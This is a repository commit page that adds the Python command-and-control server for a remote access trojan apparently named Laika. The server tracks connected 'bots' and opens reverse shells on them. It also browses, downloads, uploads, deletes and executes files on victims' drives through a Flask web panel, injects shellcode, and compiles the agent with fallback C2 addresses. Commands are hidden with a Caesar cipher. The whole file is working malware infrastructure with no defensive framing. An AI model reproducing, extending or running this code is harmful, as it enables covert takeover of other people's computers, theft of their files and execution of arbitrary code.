patate/Laika
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

add: GUI Server

Browse Source
This commit is contained in:
ALittlePatate
2024-07-09 19:37:31 +02:00
parent e0cc240808
commit ceecaf7c22
46 changed files with 3002 additions and 68 deletions
Download Patch File Download Diff File Expand all files Collapse all files

607
Server_cli/Server.py Normal file
View File

@@ -0,0 +1,607 @@
from colorama import Fore, Style
from prettytable import PrettyTable
from geoip import geolite2
from flask import Flask, request, send_file, render_template, send_from_directory, jsonify
from threading import Thread
import os, sys, time
import easygui
import errno
import select
import socket
import logging
import urllib.parse
import select
import math
import re
ADRESSE = socket.gethostbyname(socket.gethostname())
PORT = 4444
CONNECT_CLIENTS = [] #liste des sockets ouverts
THREAD_LIST = [] #tout les threads
CAESAR_KEY = 5
SELECTED_CLIENT = -1
serveur = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serveur.bind((ADRESSE, PORT))
def is_linux_user() -> bool :
platform = sys.platform
return platform == "linux" or platform == "linux2"
def CAESAR(in_s: str) -> str :
r=""
for c in in_s :
try :
r+=chr(ord(c)+CAESAR_KEY)
except :
r+=" "
return r
def CAESAR_DECRYPT(in_s: str) -> str :
r=""
for c in in_s :
try :
r+=chr(ord(c)-CAESAR_KEY)
except :
r+=" "
return r
def convert_size(size_bytes):
if size_bytes == 0:
return "0 O"
size_name = ("O", "Ko", "Mo", "Go", "To", "Po", "Eo", "Zo", "Yo")
try :
i = int(math.floor(math.log(size_bytes, 1024)))
except :
return "N"
p = math.pow(1024, i)
s = round(size_bytes / p, 2)
return "%s %s" % (s, size_name[i])
def recv_message_ret(client) :
message = ""
while True :
client.settimeout(0.1)
try :
message = client.recv(4096)
if CAESAR_DECRYPT(message.decode("latin-1")) == "done" :
break
except socket.timeout :
break
if not message:
break
if client.gettimeout() == 0:
break
return message
def recv_file(client, i, addr) :
time.sleep(0.05)
if not os.path.exists(addr):
os.makedirs(addr)
out_file = open(addr + "\\" + i, "wb")
while True:
try:
# Receive data from the socket
data = client.recv(4096)
if not data:
break
# Write the data to the file
out_file.write(data)
except socket.error as e:
if e.errno == errno.WSAEWOULDBLOCK:
# If recv would block, wait until the socket is readable
ready_to_read, _, _ = select.select([client], [], [], 1)
if not ready_to_read:
# If select timed out, try recv again
continue
else:
break
out_file.close()
time.sleep(0.05)
def recv_folder(client, path, addr, i) :
if not os.path.exists(addr + "/" + i):
os.makedirs(addr + "/" + i)
client.send(CAESAR("get_file_list").encode())
client.send(CAESAR(path + "/" + "\0").encode())
try :
files = recv_message_ret(client).decode("latin-1")
except :
return
for f_d in files.split('/') :
f = CAESAR_DECRYPT(f_d)
client.send(CAESAR("get_obj_info").encode())
client.send(CAESAR(path + '\\' + f + "\0").encode())
infos = recv_message_ret(client)
try :
infos = infos.decode("latin-1")
except :
pass
taille = infos.split("/")[0]
if taille != '0' :
#call download file
client.send(CAESAR("download_file\0").encode())
client.send(CAESAR(path + "/" + f + "\0").encode())
recv_file(client, f, addr + "/" + i)
continue
else :
recv_folder(client, path + "/" + f, addr, i + "\\" + f)
def upload_file(fp, sock):
sock.send(fp.read())
app = Flask(__name__)
# Disable Flask's default logging
log = logging.getLogger('werkzeug')
log.disabled = True
@app.route('/<path:filename>')
def serve_file(filename):
file_path = os.path.join(app.root_path, 'FileExplorer', filename)
return send_from_directory(os.path.dirname(file_path), os.path.basename(file_path))
@app.route('/')
def index() :
index_path = os.path.join(os.getcwd(), 'FileExplorer/index.html')
return send_file(index_path)
path_file_ex = ""
path_file_ex_2 = ""
FILES_=[]
CLIENT_IN_PATH = None
@app.route('/interact', methods=['POST'])
def interact() :
file_list = request.get_json()["to_send"]
action = file_list.pop(0)
if CLIENT_IN_PATH == None : return "no client"
client = CONNECT_CLIENTS[CLIENT_IN_PATH]
#print(file_list)
addr = client.getpeername()[0]
addr = os.getcwd() + "\\" + addr.replace(".","_")
files = []
if action != "upload" :
for f in file_list :
if f == None :
continue
files.append(f.split('">')[1].replace("</a>",""))
match action :
case "download" :
for i in files :
print(f"files:{files} i:{i} FILES_:{FILES_}")
path = path_file_ex_2 + i
if i in FILES_ :
#call download file
client.send(CAESAR("download_file\0").encode())
client.send(CAESAR(path + "\0").encode())
recv_file(client, i, addr)
else :
recv_folder(client, path, addr, i)
time.sleep(0.05)
case "upload" :
filename = easygui.fileopenbox()
if filename == None or path_file_ex_2 == "" :
return 'no file selected'
#print(f"{filename} --> {path_file_ex_2}")
client.send(CAESAR("upload_file\0").encode())
file_parts = filename.split('\\')
client.send(CAESAR(path_file_ex_2 + file_parts[len(file_parts)-1] + "\0").encode())
fp = open(filename, "rb")
upload_file(fp, client)
time.sleep(0.05)
case "remove" :
for i in files :
path = path_file_ex_2 + i
if i in FILES_ :
#call remove file
client.send(CAESAR("del_file\0").encode())
client.send(CAESAR(path + "\0").encode())
else :
#call remove folder
client.send(CAESAR("del_dir\0").encode())
client.send(CAESAR(path + "\0").encode())
time.sleep(0.05)
case "execute" :
for i in files :
path = path_file_ex_2 + i
if i in FILES_ :
client.send(CAESAR("execute\0").encode())
client.send(CAESAR(path + "\0").encode())
return 'ok'
def extract_filename(url):
match = re.search(r'<a class="centered">(.+?)</a>', url)
return match.group(1) if match else ''
@app.route('/get_data', methods=['POST'])
def get_data() :
global path_file_ex
global path_file_ex_2
global FILES_
global CLIENT_IN_PATH
data = []
got_path = request.get_data().decode("latin-1")
got_path = urllib.parse.unquote_plus(got_path)
if got_path and got_path != "{}" :
if "img" in got_path : got_path = got_path.split("centered\">")[1]
got_path = got_path.replace("<a>","").replace("</a>","").replace("folder_path=","")
if got_path == ".." :
folders = path_file_ex.split("/")
if folders != [".."] and folders != [""] :
folders.pop()
folders.pop()
path_file_ex = '/'.join(folders)
if path_file_ex != "" :
path_file_ex += "/"
else :
path_file_ex += got_path + "/"
else :
path_file_ex = ""
i = -1
if CONNECT_CLIENTS != [] :
data.append({"url" : f"<a>..</a>", "modified":"", "size" : ""})
for client in CONNECT_CLIENTS :
i += 1
if len(path_file_ex.split("/")) == 1 or path_file_ex == "" :
data.append({"url" : f"<a>Client n°{i}</a>", "modified":"", "size" : ""})
continue
if len(path_file_ex.split("/")) == 2 :
#getting drive letters
path_parts = path_file_ex.split("/")
client_num = int(path_parts.pop(0).replace("Client n°",""))
if client_num != i : continue
client.send(CAESAR("get_drives").encode())
drives = recv_message_ret(client)
try :
drives = drives.decode("utf-8")
except :
pass
for d in drives :
data.append({"url": f"<a>{d}</a>", "modified": "", "size":""})
continue
else :
client.send(CAESAR("get_file_list").encode())
path_parts = path_file_ex.split("/")
client_num = int(path_parts.pop(0).replace("Client n°",""))
if client_num != i : continue
path_parts[0] = path_parts[0] + ":"
CLIENT_IN_PATH = i
if path_parts[len(path_parts)-2] in FILES_ :
path_parts.pop(len(path_parts)-2)
path_file_ex_parts = path_file_ex.split("/")
path_file_ex_parts.pop(len(path_file_ex_parts)-2)
path_file_ex = '/'.join(path_file_ex_parts)
path_file_ex_2 = '/'.join(path_parts)
client.send(CAESAR(path_file_ex_2 + "\0").encode())
files = ""
try :
files = recv_message_ret(client).decode("latin-1")
except :
files = recv_message_ret(client)
if files == "" : return ""
aaa = ""
try :
aaa = files.split("/")
except : return ""
FILES_ = []
for f in aaa:
f = CAESAR_DECRYPT(f)
client.send(CAESAR("get_obj_info").encode())
client.send(CAESAR(path_file_ex_2 + f + "\0").encode())
infos = ""
try:
infos = recv_message_ret(client).decode("latin-1")
except :
infos = recv_message_ret(client)
is_dir = infos == "d"
modified = ""
taille = ""
if not is_dir :
FILES_.append(f)
if f[0] == "$" :
f = "." + f[1:]
if is_dir :
data.append({"url": f"<img src=\"images/folder.png\" alt=\"Folder Icon\" class=\"mr-3\" id=\"folder\" /><a class=\"centered\">{f}</a>",
"modified": f"{modified}", "size": f"{taille}"})
else :
data.append({"url": f"<img src=\"images/file.png\" alt=\"File Icon\" class=\"mr-3\" id=\"folder\" /><a class=\"centered\">{f}</a>",
"modified": f"{modified}", "size": f"{taille}"})
json_data = jsonify({"data":data})
return json_data
def ban() :
if is_linux_user() :
os.system("clear")
else :
os.system("title Laika - 0 bots")
os.system("cls")
print(Fore.RED + " __ _ _ ")
print(Fore.RED + " / / __ _ (_)| | __ __ _ ")
print(Fore.RED + " / / / _` || || |/ // _` |")
print(Fore.RED + "/ /___| (_| || || <| (_| |")
print(Fore.RED + "\\____/ \\__,_||_||_|\\_\\\\__,_|")
print(Style.BRIGHT + Fore.GREEN +"Là où finit l'État, commence l'arc-en-ciel." + Fore.RESET + Style.RESET_ALL)
print("")
def on_new_client() -> None :
while True :
serveur.listen(1)
client, adresseClient = serveur.accept()
client.setblocking(0)
CONNECT_CLIENTS.append(client)
def on_close_socket() -> None:
global CONNECT_CLIENTS
global SELECTED_CLIENT
while True :
for s in CONNECT_CLIENTS :
try:
# this will try to read bytes without blocking and also without removing them from buffer (peek only)
data = s.recv(16, socket.MSG_PEEK)
if len(data) == 0:
if CONNECT_CLIENTS.index(s) == SELECTED_CLIENT : SELECTED_CLIENT = -1
CONNECT_CLIENTS.remove(s)
except BlockingIOError:
pass # socket is open and reading from it would block
except ConnectionResetError:
if CONNECT_CLIENTS.index(s) == SELECTED_CLIENT : SELECTED_CLIENT = -1
CONNECT_CLIENTS.remove(s) # socket was closed for some other reason
except Exception as e:
pass
def update_title() -> None :
if is_linux_user() :
return # marche pas encore, nsm linux
while True :
if SELECTED_CLIENT == -1 :
os.system("title Laika ^| "+str(len(CONNECT_CLIENTS))+" bots")
else :
os.system("title Laika ^| "+str(len(CONNECT_CLIENTS))+" bots - Selection : n°" + str(SELECTED_CLIENT))
time.sleep(2)
def recv_message(socket_object) -> bool:
socket_object.settimeout(0.1)
while True:
try :
message = socket_object.recv(4096)
if CAESAR_DECRYPT(message.decode("latin-1")) == "Laika: session ended" :
return False
except socket.timeout :
break
if not message:
break
print(CAESAR_DECRYPT(message.decode("latin-1")), end="")
if socket_object.gettimeout() == 0:
break
return True
def main() -> None :
global SELECTED_CLIENT
THREAD_LIST.append(Thread(target = on_new_client, args = ()))
THREAD_LIST.append(Thread(target = on_close_socket, args = ()))
THREAD_LIST.append(Thread(target = update_title, args = ()))
THREAD_LIST.append(Thread(target = app.run, kwargs = {"debug":False}))
for t in THREAD_LIST :
t.daemon = True
t.start()
time.sleep(1)
ban()
while True :
cmd = input(Fore.LIGHTBLUE_EX +"-> " + Fore.RESET)
if cmd == "help" :
print("")
print("help : montre ce message")
print("clear : efface l'écran")
print("exit : ferme le serveur")
print("clients : montre les clients connectés")
print("select <ID> : sélectionne le client avec lequel intéragir")
print("deselect : désélectionne le client précédemment séléctionné avec \"select\"")
print("shell : ouvre un reverse shell dans le client précédemment séléctionné avec \"select\"")
print("fex : ouvre l'explorateur de fichiers")
print("inject <ARCH> <FILE> : upload un shellcode. ARCH --> 32/64")
print("build : build un client")
print("")
elif cmd == "exit" :
for c in CONNECT_CLIENTS :
c.close()
sys.exit(0)
elif cmd == "clear" :
ban()
elif cmd == "build" :
print("")
nb_fallbacks = input("Nombre de serveurs de fallback : ")
if not nb_fallbacks.isdigit() or int(nb_fallbacks) < 0 :
print(f"\"{nb_fallbacks}\" n'est pas un nombre valide.")
continue
ips = {}
for i in range(1, int(nb_fallbacks)+1) :
while True :
s_ip = input(f"IP du serveur {i} : ")
if "." in s_ip : #technique de shlag mais un nom de domaine peut pas être vérifié avec socket du coup on check juste le "."
s_port = input(f"Port du serveur {i} : ")
ips[CAESAR(s_ip)] = int(s_port)
break
print("")
print("Écriture de la config...")
with open("../Laika/config.h", "w") as config :
config.write(f"#define FALLBACK_SERVERS {nb_fallbacks}\n\n")
config.write("char* fallback_servers["+nb_fallbacks+"] = {\n")
for ip in ips.keys() :
config.write(f"\t\"{ip}\",\n")
config.write("};\n\n")
config.write("int fallback_servers_ip["+nb_fallbacks+"] = {\n")
for port in ips.values() :
config.write(f"\t{port},\n")
config.write("};")
print("Config écrite")
print("")
print("Compilation de l'agent..")
vs_path = os.popen("\"%ProgramFiles(x86)%/Microsoft Visual Studio/Installer/vswhere.exe\" -nologo -latest -property installationPath").read().replace("\n","") #https://stackoverflow.com/questions/46223916/msbuild-exe-not-found-cmd-exe
cmd_line = vs_path + "\\Msbuild\\Current\\Bin\\MSBuild.exe"
os.system("\""+cmd_line+"\" ../Laika /p:Configuration=Release;Platform=x86")
elif cmd == "clients" :
print("")
x = PrettyTable()
x.field_names = ["ID", "IP", "PORT", "PAYS"]
for i in range(0,len(CONNECT_CLIENTS)) :
c = CONNECT_CLIENTS[i]
addr = c.getpeername()[0]
pays = ""
match = None#geolite2.lookup(addr)
if match is not None :
pays = match.country
x.add_row([i, addr, PORT, pays])
print(x)
print()
elif "select " in cmd :
id = cmd.replace("select ","")
if not id.isdigit() or int(id) < 0 or len(CONNECT_CLIENTS) < 1 or int(id) > len(CONNECT_CLIENTS)-1 :
print(f"\"{id}\" n'est pas un ID valide.")
continue
SELECTED_CLIENT = int(id)
print(f"Client numéro : {SELECTED_CLIENT} sélectionné.")
elif cmd == "deselect":
if SELECTED_CLIENT == -1 :
print("Vous n'avez aucun client sélectionné.")
else :
print(f"Client {SELECTED_CLIENT} déselectionné.")
SELECTED_CLIENT = -1
elif cmd == "shell" :
if SELECTED_CLIENT == -1 :
print("Vous n'avez aucun client sélectionné.")
continue
client = CONNECT_CLIENTS[SELECTED_CLIENT]
client.send(CAESAR("shell").encode())
time.sleep(1)
while True :
if not recv_message(client) : break
command = input("")
client.send(CAESAR(command+"\n").encode())
print("\nSession terminée.")
elif cmd == "fex" :
print("\nClique sur le lien ci-dessous pour voir le file explorer :")
print("http://127.0.0.1:5000\n")
elif "inject" in cmd :
if SELECTED_CLIENT == -1 :
print("Vous n'avez aucun client sélectionné.")
continue
client = CONNECT_CLIENTS[SELECTED_CLIENT]
parts = cmd.split(" ")
if len(parts) > 3 or len(parts) <= 2 :
print("Commande mal formée, \"help\" pour la syntaxe.")
continue
arch = parts[1]
if arch != "32" and arch != "64" :
print("Commande mal formée, \"help\" pour la syntaxe.")
continue
fichier = parts[2]
if not os.path.isfile(fichier) :
print(f"{fichier} n'a pas été trouvé.")
continue
client.send(CAESAR("inject").encode())
client.send(CAESAR(arch).encode())
fp = open(fichier, "rb")
upload_file(fp, client)
elif cmd == "" :
pass
else :
print("Commande non reconnue, \"help\" pour afficher la liste des commandes.")
main()